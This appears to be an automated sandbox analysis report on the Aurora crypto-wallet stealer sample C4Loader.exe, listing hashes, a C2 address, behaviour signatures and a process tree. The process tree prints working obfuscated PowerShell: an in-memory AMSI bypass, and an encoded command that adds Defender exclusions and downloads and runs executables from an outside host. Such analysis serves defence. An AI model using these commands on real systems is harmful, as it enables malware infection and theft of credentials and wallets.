Analysis
-
max time kernel
134s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
10-03-2023 21:50
General
-
Target
C4Loader.exe
-
Size
687.8MB
-
MD5
66a41bcddbef0ad226adda334fc38ae6
-
SHA1
3128d77a2d71d1fc520d302f2d6a12f0c3c47a09
-
SHA256
36f02f949c036b047e57b6319d246805a710ad119850988c70b7de96b139658a
-
SHA512
541fcd5bf78329a2ccf2ad722b63bcc749bc357911bcd1a15748774a054713096906835245486e85a4766a6960a4da0cb203cdf22e0a37471745c1a4d17b5dea
-
SSDEEP
3072:ZwiwPz+huH7liXb6QF45A6Nmn0+Q/ycdIwYioOAg0FujDgtNs1bDew:CiEoX2Qm5A10+QacpDAOIs1bDew
Malware Config
Extracted
aurora
107.182.129.73:8081
Signatures
-
Aurora
Aurora is a crypto wallet stealer written in Golang.
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 10 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 18 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 5 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 10 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 17 IoCs
-
Checks processor information in registry 2 TTPs 45 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 30 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{17ef512c-24b5-4767-9aa7-f03356067398}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:DLkuzxpiwtMo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XggOdaduqXRUQk,[Parameter(Position=1)][Type]$nfmoAraTpC)$oqNUgFKcSVN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+'l'+'e'+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+''+'a'+'l'+'e'+''+'d'+''+[Char](44)+'A'+'n'+'s'+[Char](105)+'C'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+','+'A'+''+[Char](117)+'t'+'o'+''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$oqNUgFKcSVN.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+','+''+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XggOdaduqXRUQk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');$oqNUgFKcSVN.DefineMethod('I'+'n'+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+''+','+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+'e'+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'rt'+[Char](117)+'a'+[Char](108)+'',$nfmoAraTpC,$XggOdaduqXRUQk).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'ti'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $oqNUgFKcSVN.CreateType();}$wPJbanBgSZvGk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+'t'+''+[Char](46)+'W'+'i'+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'w'+'P'+''+[Char](74)+''+[Char](98)+''+'a'+'n'+[Char](66)+'g'+[Char](83)+''+[Char](90)+''+'v'+''+'G'+'k');$MmewoHmCKMDcqw=$wPJbanBgSZvGk.GetMethod(''+[Char](77)+''+[Char](109)+''+[Char](101)+''+'w'+'oHm'+'C'+''+[Char](75)+''+[Char](77)+''+[Char](68)+''+[Char](99)+''+[Char](113)+''+[Char](119)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](116)+'at'+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GkxdnnHWwGBFWcLtjmU=DLkuzxpiwtMo @([String])([IntPtr]);$JgYCiRduopqWbPjCDXmkhB=DLkuzxpiwtMo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lChRAAsfBzV=$wPJbanBgSZvGk.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+'l'+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+'n'+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+'l'+'l'+'')));$tfaaJlsLQegmFT=$MmewoHmCKMDcqw.Invoke($Null,@([Object]$lChRAAsfBzV,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+''+'r'+'a'+[Char](114)+'yA')));$qNMeBJomjoRZIOYmt=$MmewoHmCKMDcqw.Invoke($Null,@([Object]$lChRAAsfBzV,[Object](''+'V'+''+'i'+''+'r'+''+[Char](116)+'u'+[Char](97)+''+'l'+''+[Char](80)+''+'r'+'o'+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$sSCAUEk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tfaaJlsLQegmFT,$GkxdnnHWwGBFWcLtjmU).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+'d'+'l'+''+'l'+'');$GKDuPhgCSaxJJoCrS=$MmewoHmCKMDcqw.Invoke($Null,@([Object]$sSCAUEk,[Object](''+[Char](65)+''+'m'+''+[Char](115)+'i'+'S'+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+'r'+'')));$VnzVrGVOha=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qNMeBJomjoRZIOYmt,$JgYCiRduopqWbPjCDXmkhB).Invoke($GKDuPhgCSaxJJoCrS,[uint32]8,4,[ref]$VnzVrGVOha);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$GKDuPhgCSaxJJoCrS,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qNMeBJomjoRZIOYmt,$JgYCiRduopqWbPjCDXmkhB).Invoke($GKDuPhgCSaxJJoCrS,[uint32]8,0x20,[ref]$VnzVrGVOha);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'d'+'i'+'a'+''+'l'+'e'+'r'+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lUMyxnEmdpes{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xokQuBiuYyuHOx,[Parameter(Position=1)][Type]$JRWbhSGzjC)$tpYAgLqdCQc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+'l'+'e'+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+'m'+'o'+'r'+''+'y'+''+'M'+''+[Char](111)+'dul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+'l'+[Char](97)+'ss'+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+'e'+''+[Char](97)+'led'+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+'i'+''+'C'+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'uto'+[Char](67)+''+[Char](108)+'a'+'s'+'s',[MulticastDelegate]);$tpYAgLqdCQc.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+'e'+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$xokQuBiuYyuHOx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'ag'+'e'+''+[Char](100)+'');$tpYAgLqdCQc.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'H'+'i'+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$JRWbhSGzjC,$xokQuBiuYyuHOx).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $tpYAgLqdCQc.CreateType();}$kZIqmrxZnntms=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'ys'+[Char](116)+'em'+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+'o'+''+[Char](115)+'o'+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+''+'k'+'ZI'+'q'+''+'m'+''+[Char](114)+''+[Char](120)+'Znn'+[Char](116)+''+[Char](109)+''+[Char](115)+'');$DlaEXldVDwkgwK=$kZIqmrxZnntms.GetMethod(''+[Char](68)+''+[Char](108)+''+'a'+''+[Char](69)+''+[Char](88)+'l'+'d'+'V'+[Char](68)+'w'+'k'+''+[Char](103)+''+[Char](119)+'K',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+',S'+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wsqHfBvvsUVVNrpgllh=lUMyxnEmdpes @([String])([IntPtr]);$urMJHSoxhPbQxyNtWxgTtK=lUMyxnEmdpes @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UvheDItPyQA=$kZIqmrxZnntms.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+'eH'+'a'+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+'e'+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$nuGiFVUpuhLExh=$DlaEXldVDwkgwK.Invoke($Null,@([Object]$UvheDItPyQA,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+''+'r'+'y'+'A'+'')));$hxVzCbsBiJdyqmTUF=$DlaEXldVDwkgwK.Invoke($Null,@([Object]$UvheDItPyQA,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$WyyYQyN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nuGiFVUpuhLExh,$wsqHfBvvsUVVNrpgllh).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$oUfgZrYQkrNpmoMhm=$DlaEXldVDwkgwK.Invoke($Null,@([Object]$WyyYQyN,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+'f'+[Char](101)+''+'r'+'')));$RbzvxCRaEG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxVzCbsBiJdyqmTUF,$urMJHSoxhPbQxyNtWxgTtK).Invoke($oUfgZrYQkrNpmoMhm,[uint32]8,4,[ref]$RbzvxCRaEG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$oUfgZrYQkrNpmoMhm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hxVzCbsBiJdyqmTUF,$urMJHSoxhPbQxyNtWxgTtK).Invoke($oUfgZrYQkrNpmoMhm,[uint32]8,0x20,[ref]$RbzvxCRaEG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'r'+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exeC:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe2⤵
- Executes dropped EXE
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4892 -ip 48922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 452 -p 3524 -ip 35242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 3656 -ip 36562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 2000 -ip 20002⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4776 -ip 47762⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 524 -p 2416 -ip 24162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 4772 -ip 47722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 2464 -ip 24642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 520 -p 216 -ip 2162⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 3632 -ip 36322⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 5052 -ip 50522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 4160 -ip 41602⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 4188 -ip 41882⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 3760 -ip 37602⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 3820 -ip 38202⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 2656 -ip 26562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 2428 -ip 24282⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3656 -s 4042⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3524 -s 8562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQ